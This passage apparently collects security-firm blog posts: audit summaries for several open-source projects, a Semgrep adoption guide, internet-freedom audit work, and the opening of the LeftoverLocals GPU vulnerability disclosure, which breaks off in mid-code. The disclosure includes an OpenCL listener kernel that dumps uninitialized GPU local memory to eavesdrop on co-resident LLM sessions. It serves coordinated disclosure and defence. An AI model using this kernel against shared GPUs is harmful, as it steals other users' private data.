The CNCF Serverless Working group created the CloudEvents specification to standardize event declaration and delivery in a consistent, accessible, and portable way. It provides a standard format to share events across disparate cloud providers and toolsets, as well as SDKs in several programming languages.

From September to October of 2022, we performed a lightweight threat modeling assessment with the CloudEvents team, working to identify methods an attacker might use to compromise systems that implement the specification. Our team then followed up with a secure code review of the JavaScript, Go, and C# CloudEvents SDKs. For this engagement, we used a combination of automated testing tools, manual analysis, and a review of overall architecture and design. In total, we identified seven issues, including potential cross-site scripting in the JavaScript SDK and several vulnerable dependencies of all three SDKs.

Our final report includes these findings, the threat model we developed, several code quality recommendations, and guidance for using automated analysis tooling on the SDK codebases. Get all the details in OSTIF’s announcement of the engagement and our full report.

curl

It would be an understatement to say that curl is everywhere. This famous utility enables users to transfer data across a plethora of network protocols, with over 20 billion installations in “cars, television sets, routers, printers, audio equipment, mobile phones, tablets, set-top boxes, [and] media players,” according to curl’s website.

Thanks to OSTIF, our team had the privilege of conducting a review of both the curl binary and software library (libcurl) from September to October of 2022. We began our audit with a threat modeling assessment, a crucial exercise that deepened our understanding of the curl and libcurl internal components and how they work together. The resulting threat model significantly influenced our approach to reviewing the actual source code, concretizing our understanding of curl’s internals and helping us to decide which components to initially target for fuzzing and secure code review.

By the end of our code review, we found 14 issues, including two high-severity memory corruption vulnerabilities identified through fuzzing, which we conducted in parallel with our manual secure code review efforts. We helped expand curl’s fuzzing coverage and, through fuzzing that continued after the review ended, found several vulnerabilities including CVE-2022-42915, CVE-2022-43552, and a significant finding that started out as an off-hand joke. Check out our curl fuzzing coverage improvements and findings in the final report.

Kubernetes Event-Driven Autoscaling (KEDA)

KEDA is an automated scaling tool for Kubernetes containers. It comes with built-in support for numerous “scalers,” interfaces that can trigger scaling based on messages received from configured external sources, such as AWS SQS, RabbitMQ, and Redis Streams. KEDA efficiently manages the addition of Kubernetes pods to meet measured demand.

We started our review of KEDA in December of 2022 with a threat modeling exercise, walking through threat scenarios with the KEDA team. Using the threat model to inform our approach, we then conducted a code review. Our team used automated testing and manual review to discover eight findings. Among these findings was a failure to enable Transport Layer Security (TLS) for communication with Redis servers, creating a vulnerability that an attacker could exploit for person-in-the-middle attacks.

In addition to these findings, our final report presents our threat model, an evaluation of KEDA’s codebase maturity, a custom Semgrep rule we wrote to detect an encoding issue that we noticed was a pattern in the code, and long-term recommendations aimed at helping KEDA proactively enhance its overall security posture. Refer to our full report for more details.

Eclipse Mosquitto

In March of 2023, Trail of Bits had the opportunity to work with the Eclipse Foundation to assess the Mosquitto project. Mosquitto includes a popular MQTT message broker and client library (libmosquitto). Mosquitto has a broad range of applications, from home automation to bioinformatics to railway signaling infrastructure in the United Kingdom.

During this two-part engagement, we developed a threat model and then performed a secure code review of the broker application, libmosquitto, and associated command-line tools (e.g., mosquitto_passwd). Our threat model identified architecture-level weaknesses such as a lack of configurable global rate limiting in the broker and inadequate defenses against denial of service from infinite message looping. See our threat model report for these discoveries and more.

Our findings from the secure code review included a remotely triggerable buffer over-read in the broker that would cause heap memory to be dumped to disk, multiple file handling issues that could allow unauthorized users to access password hashes, and improper parsing of an HTTP header that could enable an attacker to bypass auditing capabilities and IP-based access controls for the Mosquitto WebSocket transport. Read more about these findings in our secure code review report.

Eclipse Jetty

Jetty is one of the oldest and most popular Java web server frameworks. It integrates with numerous other open-source applications including Apache Spark, Apache Maven, and Hadoop, as well as proprietary software like Google App Engine and VMWare’s Spring Boot. We were engaged to perform a lightweight threat model, secure code review, and fix review in March of 2023.

Due to the size of the Jetty codebase and the limited amount of time we had for threat modeling during this engagement, after determining the security controls to assess, we conducted a lightweight threat modeling exercise focused on identifying specific potential threats and insecure architectural patterns across components, rather than shallowly touching on many potential vulnerability types. Notable threat scenarios we discussed with the Jetty team included the implications of unsafe defaults; for example, we found that Jetty lacked default connection encryption, which could allow person-in-the-middle attacks against Jetty client connections, and that headers were inconsistently parsed, which could allow request smuggling or lead to other issues during, for example, HTTP/2 to HTTP/1 downgrade.

Oriented by the scenarios we explored during the threat modeling exercise, we conducted a three-week-long code review of Jetty. We discovered 25 findings including a possible integer overflow when parsing HTTP/2 HPACK headers (CVE-2023-36478) leading to resource exhaustion, a command injection vulnerability due to erroneous command-line argument escaping (CVE-2023-36479), and an XML external entity (XXE) injection vulnerability in the Maven metadata file parser. Our full report includes our threat model, codebase maturity evaluation, full list of findings, and fix review.

Eclipse JKube

JKube is a collection of helpful plugins and libraries for building, editing, and deploying Docker and OCI containers with Kubernetes or Red Hat OpenShift, integrating directly with Maven and Gradle. JKube can also connect to the external Kubernetes or OpenShift cluster to watch, debug, and log events. Working with the JKube maintainers between March and May of 2023, we conducted a lightweight threat model, a secure code review, and a fix review evaluating changes made to JKube after our secure code review.

After developing an understanding of the many JKube components, dependencies, and integrations, we discussed several potential threat scenarios with the JKube maintainers. Our threat modeling exercise identified a lack of common security defaults and a number of unsafe default settings, as well as general patterns of insufficient, handwritten sanitization for multiple input format types and unsafe Java deserialization practices. Our secure code review tested and expanded on our findings regarding unsafe defaults in JKube-generated artifacts. Our fix review validated that the JKube maintainers’ code changes sufficiently mitigated our code review findings. Check out our full report.

Flux

A CNCF-graduated project, Flux is a GitOps and continuous delivery tool that keeps Kubernetes state synchronized with configuration stored in a source such as a Git repository. OSTIF engaged Trail of Bits for a secure code review of Flux between July and August of 2023.

Our review resulted in 10 findings, including a path traversal vulnerability that an attacker could exploit to write to files outside of a specified root directory, particularly when Flux is included as a library in other applications. Other issues we noted included a failure to set an expiration date on cached sensitive data and a dynamic library injection vulnerability in the Flux macOS binary stemming from the fact that Apple’s Hardened Runtime feature wasn’t enabled.

Our final report includes the details of all of our findings, a codebase maturity evaluation, several code-quality issues that could contribute to a weaker security posture but were not thought to have an immediate security impact, and recommendations for incorporating regular analysis from the static analysis tools we used during the assessment into Flux’s CI/CD pipeline.

Dragonfly

Dragonfly is a peer-to-peer file distribution and image acceleration system. A CNCF-hosted project, Dragonfly features integrity checking for downloaded files, download speed limiting, the ability to isolate abnormal peers, and a public registry of artifacts that aims to be “the trusted cloud native repository for Kubernetes.” A subproject of Dragonfly, Nydus implements a content-addressable filesystem to enable high-efficiency distribution for cloud-native resources.

In July of 2023, Trail of Bits reviewed the Dragonfly codebase. Nineteen findings resulted from our secure code review, including five high-severity issues. Our findings included multiple server-side request forgery (SSRF) vulnerabilities that could enable unauthorized attackers to access internal services, an issue in the peer-to-peer API that could allow attackers to read and write to any file on a peer’s machine, and the ability for a peer to render the mTLS authentication scheme ineffective by obtaining a valid TLS certificate for any IP address.

Along with the details of our findings, our final report includes a codebase maturity evaluation, a list of code quality issues, guidance for running static and dynamic analysis tooling on the Dragonfly codebase, and our fix review.

What the future holds

These engagements may be complete, but we will continue to demonstrate our dedication to securing the internet’s open-source infrastructure going forward. We’re always learning, too! We iterate on and improve our methods, static analysis rulesets, and tooling with every assessment, incorporating new techniques and automated testing strategies, as well as client feedback. Expect more content in early 2024 about our ongoing and future work in partnership with OSTIF, including discussions of two more secure code reviews that are currently in progress. We also plan to publish a deep dive into the improvements we made to curl’s fuzzing infrastructure and technical details of some of the more interesting vulnerabilities we found during our OSTIF-organized OpenSSL and Mosquitto engagements.

Concurrently, Trail of Bits will continue supporting OSTIF’s mission through fix reviews (where contracted) for our completed secure code reviews and threat models to ensure that the vulnerabilities and design flaws we identified are mitigated. We’re very excited to take on further work that OSTIF has for us, whether it be threat modeling, secure code review, or providing security guidance in other ways.

How to introduce Semgrep to your organization

12 January 2024 at 14:00

By Maciej Domanski, Application Security Engineer

Semgrep, a static analysis tool for finding bugs and specific code patterns in more than 30 languages, is set apart by its ease of use, many built-in rules, and the ability to easily create custom rules. We consider it an essential automated tool for discovering security issues in a codebase. Since Semgrep can directly improve your code’s security, it’s easy to say, “Just use it!” But what does that mean?

Semgrep is designed to be flexible to fit your organization’s specific needs. To get the best results, it’s important to understand how to run Semgrep, which rules to use, and how to integrate it into the CI/CD pipeline. If you are unsure how to get started, here is our seven-step plan to determine how to best integrate Semgrep into your SDLC, based on what we’ve learned over the years.

The 7-step Semgrep plan

1. Review the list of supported languages to understand whether Semgrep can help you.

2. Explore: Try Semgrep on a small project to evaluate its effectiveness. For example, navigate into the root directory of a project and run:
$ semgrep --config auto

There are a few important notes to consider when running this command:

  • The --config auto option submits metrics to Semgrep, which may not be desirable.
  • Invoking Semgrep in this way will present an overview of identified issues, including the number and severity. In general, you can use this CLI flag to gain a broad view of the technologies covered by Semgrep.
  • Semgrep identifies programming languages by file extensions rather than analyzing their contents. Some paths are excluded from scanning by default using the default .semgrepignore file. Additionally, Semgrep excludes untracked files listed in a .gitignore file.

3. Dive deep: Instead of using the auto option, use the Semgrep Registry to select rulesets based on key security patterns, your tech stack, and your needs.

  • Try:
    $ semgrep --config p/default
    $ semgrep --config p/owasp-top-ten
    $ semgrep --config p/cwe-top-25

or choose a ruleset based on your technology:

$ semgrep --config p/javascript

  • Focus on rules with high confidence and medium- or high-impact metadata first. If there are too many results, limit results to error severity only using the --severity ERROR flag.
  • Resolve identified issues and include reproduction instructions in your bug reports.

4. Fine-tune: Build your ideal chain of rulesets by reviewing the effectiveness of the rulesets you currently use.

  • Check out non-security rulesets, too, such as best practices rules. This will enhance code readability and may prevent the introduction of vulnerabilities in the future. Also, consider covering other aspects of your project:
    • Shell scripts, configuration files, generic files, Dockerfiles
    • Third-party dependencies (Semgrep Supply Chain, a paid feature, can help you detect whether you are using a vulnerable package in an exploitable way)
  • To have Semgrep ignore a code pattern it flags incorrectly, add a comment in your code on the first line of the pattern match or on the preceding line, e.g., // nosemgrep: go.lang.security.audit.xss. Also, explain why you decided to disable the rule or provide a risk-acceptance reason.
  • Create a customized .semgrepignore file to reduce noise by excluding specific files or folders from the Semgrep scan. Semgrep ignores files listed in .gitignore by default. To maintain this, after creating a .semgrepignore file, add .gitignore to your .semgrepignore with the pattern :include .gitignore.
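
A minimal .semgrepignore might look like the following (the ignored paths here are hypothetical examples; adjust them to your project):

:include .gitignore
# Paths that generate noise rather than useful findings (examples)
tests/
third_party/
*.min.js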

5. Create an internal repository to aggregate custom Semgrep rules specific to your organization. A README file should include a short tutorial on using Semgrep, applying custom rules from your repository, and an inventory table of custom rules. Also, a contribution checklist will allow your team to maintain the quality level of the rules (see the Trail of Bits Semgrep rule development checklist). Ensure that adding a new Semgrep rule to your internal Semgrep repository includes a peer review process to reduce false positives/negatives.
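
To make the repository concrete, here is a sketch of what a custom rule might look like, including the fix key and metadata discussed in the next step; the rule ID, message, and pattern are hypothetical examples rather than rules from our public repository:

rules:
  - id: internal-ban-weak-hash        # hypothetical rule ID
    languages: [python]
    severity: WARNING
    message: MD5 is not collision resistant; use SHA-256 instead
    pattern: hashlib.md5($ARG)
    fix: hashlib.sha256($ARG)         # auto-fix suggestion via the fix key
    metadata:
      cwe: "CWE-328: Use of Weak Hash"
      confidence: HIGH
      likelihood: LOW
      impact: MEDIUM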

6. Evangelize: Train developers and other relevant teams on effectively using Semgrep.

  • Present pilot test results and advice on improving the organization’s code quality and security. Show potential Semgrep limitations (single-file analysis only).
  • Include the official Learn Semgrep resource and present the Semgrep Playground with “simple mode” for easy rule creation.
  • Provide an overview of how to write custom rules and emphasize that writing custom Semgrep rules is easy. Mention that the custom rules can be extended with the auto-fix feature using the fix: key. Encourage using metadata (i.e., CWE, confidence, likelihood, impact) in custom rules to support the vulnerability management process.
  • To help a developer answer the question, “Should I create a Semgrep rule for this problem?” you can use these follow-up questions:
    • Can we detect a specific security vulnerability?
    • Can we enforce best practices/conventions or maintain code consistency?
    • Can we optimize the code by detecting code patterns that affect performance?
    • Can we validate a specific business requirement or constraint?
    • Can we identify deprecated/unused code?
    • Can we spot any misconfiguration in a configuration file?
    • Is this a recurring question as you review your code?
    • How is code documentation handled, and what are the requirements for documentation?
  • Create places for the team to discuss Semgrep, write custom rules, troubleshoot (e.g., a Slack channel), and jot down ideas for Semgrep rules (e.g., on a Trello board). Also, consider writing custom rules for bugs found during your organization’s security audits/bug bounty program. A good idea is to aggregate quick notes to help your team use Semgrep (see the appendix below).
  • Pay attention to the Semgrep Community Slack, where the Semgrep community helps with problems or writing custom rules.
  • Encourage the team to report limitations and bugs they encounter while using Semgrep to the Semgrep team by filing GitHub issues (see this example issue submitted by Trail of Bits).

7. Implement Semgrep in the CI/CD pipeline by getting acquainted with the Semgrep documentation for your CI vendor. Incorporate Semgrep incrementally to avoid overwhelming developers with too many results: try a pilot test on a single repository first. Then, implement a full Semgrep scan on a schedule against the main branch in the CI/CD pipeline. Finally, add diff-aware scanning triggered by events such as pull/merge requests; a diff-aware scan examines only the changed files, maintaining efficiency, and should use a fine-tuned set of rules that produce high-confidence, true-positive results. Once the Semgrep implementation is mature, configure Semgrep in the CI/CD pipeline to block the PR pipeline on unresolved Semgrep findings.
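
As a rough sketch only, assuming GitHub Actions as the CI vendor (the workflow name, schedule, and container image are assumptions to adapt to your environment), a scheduled full scan of the main branch could look like this:

name: semgrep-full-scan               # hypothetical workflow name
on:
  push:
    branches: [main]
  schedule:
    - cron: "0 4 * * 1"               # example schedule: weekly full scan
jobs:
  semgrep:
    runs-on: ubuntu-latest
    container: returntocorp/semgrep   # Semgrep container image (verify the current official name)
    steps:
      - uses: actions/checkout@v4
      - run: semgrep --config p/default --error   # --error fails the job when there are findings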

What’s next? Maximizing the value of Semgrep in your organization

As you introduce Semgrep to your organization, remember that it undergoes frequent updates. To make the most of its benefits, assign one person in your organization to be responsible for analyzing new features (e.g., Semgrep Pro, which extends codebase scanning with inter-file coding paradigms instead of Semgrep’s single-file approach), informing the team about external repositories of Semgrep rules, and determining the value of the paid subscription (e.g., access to premium rules).

Furthermore, use the Trail of Bits Testing Handbook, a concise guide that helps developers and security professionals maximize the potential of static and dynamic analysis tools. The first chapter of this handbook focuses specifically on Semgrep. Check it out to learn more!

Appendix: Things I wish I’d known before I started using Semgrep

Using Semgrep

  • Use the --sarif output flag with the Sarif Viewer extension in Visual Studio Code to efficiently navigate through the identified code (see the example command after this list).
  • The --config auto option may miss some vulnerabilities. Manual language selection (--lang) and rulesets can be more effective.
  • You can use an alias (alias semgrep="semgrep --metrics=off") or the SEMGREP_SEND_METRICS environment variable so you don't have to remember to disable metrics each time.
  • Use ephemeral rules, e.g., semgrep -e 'exec(...)' --lang=py ./, to quickly use Semgrep in the style of the grep tool.
  • Enable the autocomplete feature so you can use the TAB key to work faster on the command line.
  • You can run several predefined configurations simultaneously: semgrep --config p/cwe-top-25 --config p/jwt.
  • A Semgrep Pro Engine feature removes Semgrep’s limitations in analyzing only single files.
  • Rules from the Semgrep Registry can be tested in a playground (see Trail of Bits anonymous-race-condition rule).
  • Metavariable analysis supports two analyzers: redos and entropy.
  • You can use metavariable-pattern to match patterns across different languages within a single file (e.g., JavaScript embedded in HTML).
  • The focus-metavariable can reduce false positives in taint mode.
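
For example, to produce a SARIF report for the viewer extension mentioned in the first tip above (the output file name is arbitrary):
$ semgrep --config p/default --sarif --output results.sarif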

Writing rules

  • Metavariables must be capitalized: $A, not $a
  • Use pattern-regex: (?s)\A.*\Z pattern to identify a file that does not contain a specific string (see example)
  • When writing a regular expression across multiple lines, use the >- YAML block scalar, not |. The | scalar preserves newline characters (\n) and will likely cause the regex to fail (see example)
  • You can use typed metavariables, e.g., $X == (String $Y) (see the example rule after this list)
  • Semgrep patterns can match variable assignment statements directly; for example, a pattern like $RET = $FUNC(...) matches any assignment of a function call's result

  • You can write patterns that match method chaining, e.g., $OBJ.first(...).second(...)

  • The Deep Expression Operator matches complex, nested expressions using the syntax
    <... pattern ...>

  • It is possible to apply specific rules to specific paths using the paths keyword (see the avoid-apt-get-upgrade rule, which applies only to Dockerfiles):
        paths:
          include:
            - "*dockerfile*"
            - "*Dockerfile*"
    
  • And last, Trail of Bits has a public Semgrep rules repository! Check it out here and use it immediately with the semgrep --config p/trailofbits command.
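
To illustrate the typed metavariable tip above, a minimal rule could look like the following (the rule ID and message are made up for this example):

rules:
  - id: java-string-reference-equality   # hypothetical rule ID
    languages: [java]
    severity: WARNING
    message: Strings compared with ==; use .equals() instead
    # Typed metavariable: match only when the right-hand side is a String
    pattern: $X == (String $Y)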

Useful links

For more on creating custom rules, read our blogs on machine learning libraries and discovering goroutine leaks.
We’ve compiled a list of additional resources to further assist you in your Semgrep adoption process. These links provide a variety of perspectives and detailed information about the tool, its applications, and the community that supports it:

Internet freedom with the Open Technology Fund

15 January 2024 at 13:30

By Spencer Michaels, William Woodruff, Jeff Braswell, and Cliff Smith

Trail of Bits cares about internet freedom, and one of our most valued partners in pursuit of that goal is the Open Technology Fund (OTF). Our core values involve focusing on high-impact work, including work with a positive social impact. The OTF’s Red Team Lab exists to provide auditing services for the software that protects privacy and ensures open access to the internet, free of censorship. We’re a proud member of the Red Team Lab and have performed numerous engagements on software products that are critical to internet freedom. See what we’ve been up to below.

Security and usability improvements to PyPI

Back in 2019, we partnered with Changeset Consulting and Kabu Creative through the OTF to make security and usability improvements to Warehouse, the codebase that powers the Python Package Index (PyPI). PyPI’s criticality within the Python ecosystem is impossible to overstate: with over 500,000 projects and 750,000 project maintainers as of 2024, PyPI serves over a billion package downloads daily.

Our work on PyPI had four major angles:

  • Implementing strong multi-factor authentication (MFA) methods on PyPI, in the forms of TOTP and WebAuthn
  • Adding scopeable API tokens to PyPI to allow project maintainers to move away from insecure username/password pairs for package publishing
  • Adding audit events to PyPI users and projects so maintainers could review security-sensitive actions performed on their accounts and projects
  • Adding accessibility and internationalization enhancements to PyPI’s Web UI, including alignment with the W3C’s Web Content Accessibility Guidelines

Our work was an essential part of PyPI’s modernization efforts, following on the heels of Warehouse’s 2018 public beta. Scoped API tokens and modern MFA methods also made PyPI an early “gold standard” for package index security practices, with other major indices subsequently adding WebAuthn and scopeable API tokens once their security and usability benefits were clear.

All told, these improvements helped raise the security bar for one of the internet’s most critical packaging ecosystems. In doing so, they also demonstrated that indices can make security-enhancing changes without compromising users’ and developers’ ordinary workflows.

Auditing PyPI and its deployment infrastructure

In 2023, we came back to PyPI on the assurance side: in August and September, we audited a medley of codebases tied to PyPI and its deployment infrastructure:

  • Warehouse itself, which makes up the bulk of PyPI’s front end and back end
  • cabotage, which provides a Heroku-esque deployment substrate for PyPI’s runtime services
  • readme_renderer, which PyPI uses to safely render arbitrary (package-supplied) README files into HTML

Our audits of these codebases took place over 10 engineer-weeks and uncovered a total of 29 findings, including some with the potential to disclose otherwise private account states or compromise the integrity of PyPI’s runtime services. We concluded our audit with a fix review, in which we determined that PyPI’s maintainers had satisfactorily patched or otherwise mitigated every finding.

The results of our audits validated PyPI’s development philosophy: a strong emphasis on automated testing, linting, and QA meant that relatively few low-hanging bugs were found and that the majority of findings occurred in parts of the codebase where individual services could interact in unintended ways. We believe this merits consideration in other packaging ecosystems, especially as general interest in supply chain security rises. An ounce of prevention in the form of tests and automated QA is worth a pound of cure at the time of the audit.

You can read our audit report, as well as our accompanying blog post, for more details. PyPI’s administrators have also released a three-part blog post series with an in-depth analysis of each finding: part 1, part 2, and part 3.

OpenArchive’s Save application on iOS and Android

Human rights activists, journalists, and civil society organizations all have a common need to preserve and share media in a way that protects privacy while avoiding data loss and tampering. The OpenArchive Save app provides this diverse group of users with a way to securely upload photos and videos to shared storage providers, optionally using the Tor anonymization network and including cryptographic signatures that authenticate the media files. We recently conducted two code reviews for the iOS and Android versions of the Save app.

Using a threat model that included bad-acting nation states with broad censorship powers, our consultants assessed the Save applications using dynamic testing and code review. OpenArchive worked quickly to improve the security and design of the applications, including performing substantial refactoring, in the months following our engagement. These updates helped defend against social engineering, protect locally stored media and credentials from theft, and ensure safe transmission of data across networks operated by a hostile adversary. We also provided guidance that will help OpenArchive make the best possible use of available cryptographic tools in the future. You can see the publications for each application version in our publications repository: the iOS summary report and the Android summary report.

What the future holds

Knowing the OTF’s vision of “community, collaboration, and curiosity,” we are looking forward to bringing our foundation in fuzzing and continuous testing to future engagements. After all, we often find issues that would be easy to spot early in development with the correct security tooling but that make their way across the software life cycle undetected. In the spirit of collaboration, we’ve gathered what we’ve learned about continuous testing into our new Testing Handbook, which is free for everyone to use.

In addition to effective testing techniques, internet freedom requires reliable software development ecosystems to support open-source development. Our work connected to PyPI has improved the security posture of the Python ecosystem at large, and we welcome opportunities to continue this work in other domains.

LeftoverLocals: Listening to LLM responses through leaked GPU local memory

16 January 2024 at 17:00

By Tyler Sorensen and Heidy Khlaaf

We are disclosing LeftoverLocals: a vulnerability that allows recovery of data from GPU local memory created by another process on Apple, Qualcomm, AMD, and Imagination GPUs. LeftoverLocals impacts the security posture of GPU applications as a whole, with particular significance to LLMs and ML models run on impacted GPU platforms. By recovering local memory—an optimized GPU memory region—we were able to build a PoC where an attacker can listen into another user’s interactive LLM session (e.g., llama.cpp) across process or container boundaries, as shown below:

Figure 1: An illustration of how LeftoverLocals can be used to implement an attack on an interactive LLM chat session. The LLM user (left) queries the LLM, while a co-resident attacker (right) can listen to the LLM response.

LeftoverLocals can leak ~5.5 MB per GPU invocation on an AMD Radeon RX 7900 XT which, when running a 7B model on llama.cpp, adds up to ~181 MB for each LLM query. This is enough information to reconstruct the LLM response with high precision. The vulnerability highlights that many parts of the ML development stack have unknown security risks and have not been rigorously reviewed by security experts.

Figure 2: LeftoverLocals logo: what leftover data is your ML model leaving for another user to steal?

This vulnerability is tracked by CVE-2023-4969. It was discovered by Tyler Sorensen as part of his work within the ML/AI Assurance team. Tyler Sorensen is also an assistant professor at UCSC. Since September 2023, we have been working with CERT Coordination Center on a large coordinated disclosure effort involving all major GPU vendors, including: NVIDIA, Apple, AMD, Arm, Intel, Qualcomm, and Imagination.

As of this writing, the statuses of the impacted vendors (Apple, AMD, and Qualcomm) are as follows:

  • Apple: Despite multiple efforts to establish contact through CERT/CC, we only received a response from Apple on January 13, 2024. We re-tested the vulnerability on January 10 and found that some devices appear to have been patched, such as the Apple iPad Air (3rd generation, A12). However, the issue still appears to be present on the Apple MacBook Air (M2). Furthermore, the recently released Apple iPhone 15 does not appear to be impacted as previous versions have been. Apple has confirmed that the A17 and M3 series processors contain fixes, but we have not been notified of the specific patches deployed across their devices.
  • AMD: We have confirmed with AMD that their devices remain impacted, although they continue to investigate potential mitigation plans. Their statement on the issue can be read here.
  • Qualcomm: We received notice that there is a patch to Qualcomm firmware v2.07 that addresses LeftoverLocals for some devices. However, there may still be other devices impacted at this time. A Qualcomm representative has provided the following comment: “Developing technologies that endeavor to support robust security and privacy is a priority for Qualcomm Technologies. We commend Dr. Tyler Sorensen and Dr. Heidy Khlaaf from the AI/ML Assurance group at Trail of Bits for using coordinated disclosure practices and are in the process of providing security updates to our customers. We encourage end users to apply security updates as they become available from their device makers.”
  • Imagination: Despite not observing LeftoverLocals ourselves across the Imagination GPUs that we tested, Google has confirmed that some Imagination GPUs are indeed impacted. Imagination released a fix in their latest DDK release, 23.3, made available to customers in December 2023.

Further details are discussed in “Coordinated disclosure,” and a list of tested and impacted devices can be found in “Testing GPU platforms for LeftoverLocals.” Other vendors have provided us the following details:

  • NVIDIA: confirmed that their devices are not currently impacted. One reason for this could be that researchers have explored various memory leaks on NVIDIA GPUs previously, and thus, they are aware of these types of issues.
  • ARM: also confirmed that their devices are not currently impacted.

We did not hear a response from Intel, but we tested at least one of their GPUs and did not observe that it was impacted.

Exploit brief

GPUs were initially developed to accelerate graphics computations. In this domain, performance is critical, and previously uncovered security issues have generally not had any significant consequences on applications. Historically, this meant that GPU hardware and software stacks iterated rapidly, with frequent major architecture and programming model changes. This has led to complex system stacks and vague specifications. For example, while CPU ISAs have volumes of documentation, NVIDIA simply provides a few short tables. This type of vague specification has led to alarming issues, both in the past and today, as LeftoverLocals exemplifies.

Exploitation requirements

This is a co-resident exploit, meaning that a threat actor’s avenue of attack could be implemented as another application, app, or user on a shared machine. The attacker only requires the ability to run GPU compute applications, e.g., through OpenCL, Vulkan, or Metal. These frameworks are well-supported and typically do not require escalated privileges. Using these, the attacker can read data that the victim has left in the GPU local memory simply by writing a GPU kernel that dumps uninitialized local memory. These attack programs, as our code demonstrates, can be less than 10 lines of code. Implementing these attacks is thus not difficult and is accessible to amateur programmers (at least in obtaining stolen data). We note that it appears that browser GPU frameworks (e.g., WebGPU) are not currently impacted, as they insert dynamic memory checks into GPU kernels.

Unless the user inspects the application's low-level GPU source code, it is not possible for them to determine whether their application is using GPU local memory; this matter is further complicated because the GPU code is often hidden deep in library calls, at low levels of deep software stacks (e.g., for ML). Overall, there are very limited ways to observe that an attacker is currently stealing data, or has stolen data. This attack hinges on the attacker reading uninitialized memory on the GPU, and while this is technically undefined behavior, it is not currently checked dynamically or logged. Any additional defenses would be quite invasive, e.g., performing code analysis on GPU kernels to check for undefined behavior.

We have released a PoC that exploits this vulnerability, and the sections below describe how it works.

User mitigations

Given the lack of comprehensive patches across impacted GPU vendors, LeftoverLocals can be defended against by modifying the source code of all GPU kernels that use local memory. Before the kernel ends, the GPU threads should clear (e.g., store 0s to) any local memory locations that were used in the kernel. Additionally, users should ensure the compiler doesn't remove these memory-clearing instructions (e.g., by annotating their local memory as volatile), as the compiler may detect that the cleared memory is not used later in the kernel. This is difficult to verify because GPU binaries are typically not stored explicitly, and there are very few GPU binary analysis tools. For reasons like this, we note that this mitigation may be difficult for many users, and we discuss this further in “Mitigations” below.
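
As a rough sketch of this mitigation (the kernel name and computation are placeholders, and LM_SIZE is assumed to be defined at build time, as in the listener and writer kernels shown below), a kernel that uses local memory could zero it out before returning:

__kernel void my_compute_kernel(__global int *out) {   // hypothetical kernel
  local volatile int lm[LM_SIZE];
  // ... the kernel's real computation, using lm as a scratch buffer ...
  // Mitigation: overwrite every local memory location this kernel used so that
  // leftover values cannot be observed by a subsequently scheduled kernel.
  for (int i = get_local_id(0); i < LM_SIZE; i += get_local_size(0)) {
    lm[i] = 0;
  }
  // The volatile qualifier above helps keep the compiler from eliding these
  // stores as dead writes.
  barrier(CLK_LOCAL_MEM_FENCE);
}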

The vulnerability: LeftoverLocals

In this section we describe the vulnerability, named LeftoverLocals, and the corresponding exploit in more detail. We then detail our testing campaign across a wide variety of GPU devices, which found that GPUs from AMD, Apple, and Qualcomm are vulnerable to LeftoverLocals. For those unfamiliar with GPU architecture and terminology, we provide a more in-depth level-setter in “Background: How GPUs work.” We also note that while GPU memory leaks are not new (a further discussion follows below), LeftoverLocals has demonstrated both deeper impact and wider breadth than previously discovered vulnerabilities.

At a high level, we found that several GPU frameworks do not sufficiently isolate memory in the same way that it is traditionally expected in CPU-based frameworks. We have observed that on impacted GPUs, it is possible for one kernel—potentially from another user that is co-resident on the same machine—to observe values in local memory that were written by another kernel. Thus, an attacker who has access to a shared GPU through its programmable interface (e.g., OpenCL) can steal memory from other users and processes, violating traditional process isolation properties. This data leaking can have severe security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights.

Previous academic work showed that NVIDIA GPUs leaked memory across processes through a variety of memory regions, including local memory. However, they examined only GPUs from NVIDIA (and the results from this paper may be part of the reason why we didn't observe LeftoverLocals on NVIDIA GPUs). They also did not discuss the impact on widely deployed use cases, such as ML. Other works have shown how GPUs leak graphics data, and that a co-resident attacker can reconstruct partial visual information from another process (see some examples documented here, here, and here). Despite these prior works, LeftoverLocals shows that many GPUs remain vulnerable to local memory leaks and that this vulnerability can be exploited in co-resident attacks on important ML applications.

Overall, this vulnerability can be illustrated using two simple programs: a Listener and a Writer. The Writer repeatedly launches a GPU kernel that writes canary values to local memory, while the Listener repeatedly launches a GPU kernel that reads from uninitialized local memory and checks for those canary values. Below, we demonstrate how each of these operations is carried out.

The Listener: The Listener launches a GPU kernel that reads from uninitialized local memory and stores the result in a persistent main memory region (i.e., global memory). This can be accomplished with the OpenCL kernel below:

__kernel void listener(__global volatile int *dump) {
  local volatile int lm[LM_SIZE];
  for (int i = get_local_id(0); i < LM_SIZE; i+= get_local_size(0)) {
    dump[((LM_SIZE * get_group_id(0)) + i)] = lm[i];
  }
}

The keyword __kernel denotes that this is the GPU kernel function. We pass a global memory array dump to the function; whatever the kernel writes to this array can be read later by the CPU. We statically declare a local memory array lm with a predefined size LM_SIZE (which we set to the maximum local memory size of each GPU we test). This program technically contains undefined behavior, as it reads from uninitialized local memory. Because of this, we use the volatile qualifier to suppress aggressive compiler optimizations that might optimize away the memory accesses. In fact, our code contains a few more code patterns to further stop the compiler from optimizing away our memory dump. This is more a matter of trial and error than a science.

For each loop iteration, each invocation (thread) reads from a location in local memory and dumps that value to a unique location in the dump array. The only tricky part of this code is the indexing: because local memory is disjoint across workgroups, workgroup-local IDs need to be mapped to a unique global index in dump. The code uses built-in identifiers to achieve this, which are documented here. At the end of the kernel, dump contains every value that was stored in local memory when the listener kernel started executing. Because dump is in the global memory region, it can be examined by the CPU host code to check for canary values.

The Writer: On the other hand, the Writer launches a kernel that writes a canary value to local memory (for example, this work uses the value 123). We show an example of the OpenCL kernel code below:

__kernel void writer(__global volatile int *canary) {
  local volatile int lm[LM_SIZE];
  for (uint i = get_local_id(0); i < LM_SIZE; i+=get_local_size(0)) {
    lm[i] = canary[i];
  }
}

This code is very similar to the Listener, except that rather than dumping local memory, we are writing a value. In this case, we are writing a value from an array canary. We use an extra array so that the compiler does not optimize away the memory write (as it is prone to do with constant values). At the end of the kernel, the writer has filled all available local memory with the canary values.

The CPU programs for both the Listener and the Writer launch their respective kernels repeatedly. In the case of the listener, at each iteration, the CPU analyzes the values observed in the local memory and checks for the canary value. On a server, these two programs can be run by different users or in different Docker containers. On a mobile device, these routines can be run in different apps. The apps can be swapped in and out of focus to alternate reading and writing. If the Listener can reliably read the canary values, then we say that the platform is vulnerable to LeftoverLocals.
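
For concreteness, the host side of the Listener boils down to a loop like the following C sketch; OpenCL setup (creating the context, queue, program, and buffers) is omitted, and the function and variable names are ours, not taken from the PoC repository:

#include <CL/cl.h>
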